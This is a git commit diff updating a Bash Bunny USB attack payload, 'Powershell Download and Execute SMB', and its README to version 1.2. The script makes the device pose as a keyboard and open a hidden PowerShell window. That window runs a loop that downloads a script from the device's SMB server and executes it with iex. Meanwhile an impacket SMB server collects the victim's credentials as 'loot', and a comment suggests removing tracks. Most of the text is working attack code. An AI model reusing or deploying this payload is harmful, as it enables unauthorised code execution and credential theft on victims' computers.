Updated psh_DownloadExecSMB payload for fw v1.2 (#209)
* Powershell SMB Delivery * fixed smbserver.py call * Combined ATTACK MODES, improved SMB check * version fixpull/213/head
hink
Sebastian Kinne
parent
4165a2dda9
commit
4d9bfeedd3
|
|
@ -2,11 +2,11 @@
|
|||
#
|
||||
# Title: Powershell Download and Execute SMB
|
||||
# Author: LowValueTarget
|
||||
# Version: 1.0
|
||||
# Version: 1.2
|
||||
# Category: Powershell
|
||||
# Target: Windows XP SP3+ (Powershell)
|
||||
# Attackmodes: HID, RNDIS_ETHERNET
|
||||
# Firmware: >= 1.1
|
||||
# Firmware: >= 1.2
|
||||
#
|
||||
# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.
|
||||
# Ensure psh.txt exists in payload directory
|
||||
|
|
@ -15,17 +15,19 @@
|
|||
#
|
||||
# | Attack Stage | Description |
|
||||
# | ------------------- | ------------------------------|
|
||||
# | Stage 1 | HID |
|
||||
# | Stage 2 | RNDIS_ETHERNET |
|
||||
# | Stage 3 | Delivering powershell payload |
|
||||
# | Stage 1 | Powershell |
|
||||
# | Stage 2 | Delivering powershell payload |
|
||||
#
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
|
||||
# SETUP
|
||||
LED SETUP
|
||||
REQUIRETOOL impacket # required for SMB server
|
||||
|
||||
GET SWITCH_POSITION
|
||||
GET TARGET_HOSTNAME
|
||||
GET HOST_IP
|
||||
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
# Check for psh.txt
|
||||
|
|
@ -48,30 +50,19 @@ mkdir -p ${LOOTDIR}/${HOST}-$COUNT
|
|||
# Log file
|
||||
LOGFILE=psh_smb.log
|
||||
|
||||
# Prevent premature access to SMB server
|
||||
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all
|
||||
|
||||
# Start SMB Server
|
||||
mkdir -p /loot
|
||||
python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
|
||||
|
||||
# STAGE 1 - HID
|
||||
# STAGE 1 - Powershell
|
||||
LED STAGE1
|
||||
ATTACKMODE HID
|
||||
|
||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) {If (Test-Connection 172.16.64.1 -count 1 -quiet) {iex (New-Object Net.WebClient).DownloadString('\\\172.16.64.1\s\psh.txt');New-Item \\\172.16.64.1\s\COMPLETE -ItemType file;exit}}\""
|
||||
RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
|
||||
# Remove tracks in the psh payload if you wish
|
||||
|
||||
# STAGE 2 - ETHERNET/SMB
|
||||
LED STAGE2
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
|
||||
# Re-enable ICMP ping to trigger the powershell stager
|
||||
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
|
||||
|
||||
# STAGE 3 - Wait until payload retrieved
|
||||
# STAGE 2 - Wait until payload retrieved
|
||||
# Wait until payload is retrieved
|
||||
LED STAGE3
|
||||
LED STAGE2
|
||||
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
|
||||
|
||||
# CLEANUP
|
||||
|
|
@ -81,6 +72,6 @@ LED CLEANUP
|
|||
mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
|
||||
rm /loot/${LOGFILE}
|
||||
# Sync file system
|
||||
sync; sleep 1; sync
|
||||
sync
|
||||
|
||||
LED FINISH
|
||||
|
|
|
|||
|
|
@ -2,11 +2,11 @@
|
|||
## Powershell Download and Execute SMB
|
||||
|
||||
* Author: LowValueTarget
|
||||
* Version: Version 1.0
|
||||
* Version: Version 1.2
|
||||
* Target: Windows XP SP3+ (Powershell)
|
||||
* Category: Powershell
|
||||
* Attackmodes: HID, RNDIS_Ethernet
|
||||
* Firmware: >= 1.1
|
||||
* Firmware: >= 1.2
|
||||
|
||||
## Description
|
||||
|
||||
|
|
@ -21,6 +21,5 @@ Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer
|
|||
|
||||
| Attack Stage | Description |
|
||||
| ------------------- | ------------------------------|
|
||||
| Stage 1 | HID |
|
||||
| Stage 2 | RNDIS_ETHERNET |
|
||||
| Stage 3 | Delivering powershell payload |
|
||||
| Stage 1 | Powershell |
|
||||
| Stage 2 | Delivering powershell payload |
|
||||
Loading…
Reference in New Issue